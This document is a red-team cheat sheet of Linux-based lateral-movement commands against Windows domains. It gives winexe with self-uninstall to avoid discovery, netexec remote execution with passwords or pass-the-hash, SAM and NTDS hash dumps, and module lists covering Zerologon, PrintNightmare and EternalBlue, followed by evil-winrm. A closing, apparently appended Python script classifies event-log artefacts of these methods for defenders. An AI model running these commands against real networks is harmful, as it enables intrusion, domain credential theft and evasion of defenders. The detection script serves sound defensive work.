Linux_LateralMovement

1. Winexe

-U                        sets the username and password parameter
Administrator%P@ssw0rd    host username and password, separated by %
--uninstall               on exiting the controlled host, automatically uninstalls the winexe service so it is not discovered
//127.0.0.1               format for the target IP address
command                   cmd.exe, the final argument, is the program to run

winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 cmd.exe // returns an interactive console
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 "whoami /user"

2. netexec

smb Command (codec)

netexec smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk

smb Command (codec, legacy cme alias)

cme smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec=gbk

smb Command PTH

netexec smb 192.168.3.110 -u Administrator -H 'ccef208c6485269c20db2cad21734fe7' -x "whoami /user" --codec gbk

smb PowerShell Command

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk -X '$PSVersionTable'

smb exec-method smbexec,wmiexec,mmcexec,atexec

--exec-method {smbexec,wmiexec,mmcexec,atexec}

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method smbexec -x "whoami"

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method mmcexec -x "whoami"

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method atexec -x "whoami"

winrm Command

netexec winrm 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk

sam dump

netexec winrm 192.168.3.110 -u Administrator -p Admin12345 --sam --codec gbk

smb dump ntds hash

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --codec gbk

smb dump ntds hash log

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --log offensive.log --codec gbk

smb dump ntds hash via ntdsutil module (lower success rate)

netexec smb 192.168.3.110 -u Administrator -p Admin12345 -M ntdsutil --codec gbk

pass-pol

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --pass-pol

disks

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --disks

loggedon-users

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --loggedon-users

ldap query

netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" ""

ldap query1

netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" "sAMAccountName pwdLastSet"

netexec smb -L

└─$ netexec smb -L
LOW PRIVILEGE MODULES
[*] add-computer              Adds or deletes a domain computer
[*] dfscoerce                 Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc                   Drop a searchConnector-ms file on each writable share
[*] enum_av                   Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca                   Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin             Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password              Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver             This module helps you to identify hosts that have additional active interfaces
[*] ms17-010                  MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac                     Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam                Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug                Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare            Check if host vulnerable to printnightmare
[*] scuffy                    Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce              Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky                    Creates windows shortcuts with the icon attribute containing a URI to the specified  server (default SMB) in all shares with write permissions
[*] spider_plus               List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler                   Detect if print spooler is enabled or not
[*] webdav                    Checks whether the WebClient service is running on the target
[*] zerologon                 Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

netexec smb zerologon

netexec smb 192.168.3.110 -u dbadmin -p Admin12345 -M zerologon

netexec ldap -L

└─$ netexec ldap -L
LOW PRIVILEGE MODULES
[*] adcs                      Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread                  Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts               Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer             Finds computers in the domain via the provided text
[*] get-desc-users            Get description of the users. May contained password
[*] get-network               Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword      Get unixUserPassword attribute from all users in ldap
[*] get-userPassword          Get userPassword attribute from all users in ldap
[*] group-mem                 Retrieves all the members within a Group
[*] groupmembership           Query the groups to which a user belongs.
[*] laps                      Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker              Checks whether LDAP signing and binding are required and / or enforced
[*] maq                       Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete                  Extract all obsolete operating systems from LDAP
[*] pso                       Module to get the Fine Grained Password Policy/PSOs
[*] subnets                   Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc                 Get user descriptions stored in Active Directory
[*] whoami                    Get details of provided user

netexec ldap maq

netexec ldap 192.168.3.110 -u Administrator -p Admin12345 -M maq

netexec ldap whoami

netexec ldap get-network

netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M get-network

netexec ldap adcs

netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M adcs

netexec ldap trusts

netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M enum_trusts

3. evil-winrm

evil-winrm -i 192.168.3.110 -u Administrator -p Admin12345
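As an added defender-side example (not part of the original cheat sheet) covering the winexe section, the --exec-method list and the evil-winrm section above: each remote-exec method leaves a different host artefact (a service install, a scheduled task, or a shell spawned under WmiPrvSE.exe or wsmprovhost.exe), and this script classifies Windows event records by those artefacts. The field names, the loopback-share pattern and the sample records are assumptions modelled on the tools' public behaviour, not taken from the page.

```python
import re

# Added example: map Windows event records to the lateral-movement method that
# typically produces them. Rules and sample records are assumptions to be tuned.

def _get(r, key):
    return r.get(key, "")

RULES = [
    ("winexe service install",
     lambda r: r["EventID"] == 7045
     and "winexesvc" in _get(r, "ImagePath").lower()),
    # smbexec-style: a service whose binary path runs cmd.exe and redirects
    # output to a loopback ADMIN$/C$ share (pattern assumed, adjust locally)
    ("smbexec-style service running cmd.exe via a loopback share",
     lambda r: r["EventID"] == 7045
     and re.search(r"cmd\.exe|%comspec%", _get(r, "ImagePath"), re.I)
     and re.search(r"\\\\127\.0\.0\.1\\(admin|c)\$", _get(r, "ImagePath"), re.I)),
    ("atexec-style scheduled task running cmd.exe",
     lambda r: r["EventID"] == 4698
     and "cmd.exe" in _get(r, "TaskContent").lower()),
    ("wmiexec-style cmd.exe spawned by WmiPrvSE.exe",
     lambda r: r["EventID"] == 4688
     and _get(r, "ParentProcessName").lower().endswith("wmiprvse.exe")
     and _get(r, "NewProcessName").lower().endswith("cmd.exe")),
    ("WinRM shell (evil-winrm style) under wsmprovhost.exe",
     lambda r: r["EventID"] == 4688
     and _get(r, "ParentProcessName").lower().endswith("wsmprovhost.exe")),
]

def classify(record):
    """Return the names of all rules matching one event record."""
    return [name for name, pred in RULES if pred(record)]

def scan(records):
    """Return (host, rule) pairs for every record that matched any rule."""
    return [(r["Computer"], name) for r in records for name in classify(r)]

SAMPLE_EVENTS = [  # constructed records, not real log data
    {"Computer": "WS01", "EventID": 7045, "ServiceName": "winexesvc",
     "ImagePath": "winexesvc.exe"},
    {"Computer": "WS01", "EventID": 7045, "ServiceName": "svc1",
     "ImagePath": "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output "
                  "2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat"},
    {"Computer": "WS02", "EventID": 4698, "TaskName": "\\task1",
     "TaskContent": "<Task><Exec><Command>cmd.exe</Command></Exec></Task>"},
    {"Computer": "WS02", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    {"Computer": "DC01", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe"},
    {"Computer": "WS03", "EventID": 7045, "ServiceName": "Sense",  # benign install
     "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\""},
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(host, "->", rule)
```

Legitimate admin tooling also installs services and creates tasks, so treat a match as a lead to correlate with the 4624 type 3 network logon that preceded it rather than as a verdict on its own.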